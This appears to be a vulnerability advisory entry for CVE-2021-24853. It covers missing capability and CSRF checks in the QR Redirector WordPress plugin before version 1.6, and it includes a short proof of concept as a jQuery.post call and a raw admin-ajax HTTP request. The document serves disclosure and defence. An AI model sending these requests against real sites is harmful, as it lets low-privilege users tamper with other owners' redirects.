Lucene search
Apple502jWPEX-ID:240BED24-0315-4BBF-BA17-E4947E5ECACBHistoryOct 18, 2021 - 12:00 a.m.
QR Redirector < 1.6 - Subscriber+ Arbitrary QR Redirect Response Status Update
2021-10-1800:00:00
apple502j
351
qr redirector
version 1.6
arbitrary
response update
post
admin-ajax
exploit
EPSS
0.001
Percentile
36.7%
The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qr_save_bulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects
jQuery.post(ajaxurl, {
qr_redirect_response: 308,
post_ids: [830],
action: "qr_save_bulk"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Connection: close
Cookie: [any authenticated user]
qr_redirect_response=308&post_ids%5B%5D=830&action=qr_save_bulkRelated
cnvd
cnvd
WordPress Cross-site Request Forgery Vulnerability (CNVD-2021-91416)
2021-11-22 00:00:00
wpvulndb
wpvulndb
cvelist
cvelist
cve
cve
CVE-2021-24853
2021-11-17 11:15:08
nvd
nvd
CVE-2021-24853
2021-11-17 11:15:08
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2021-11-17 11:15:00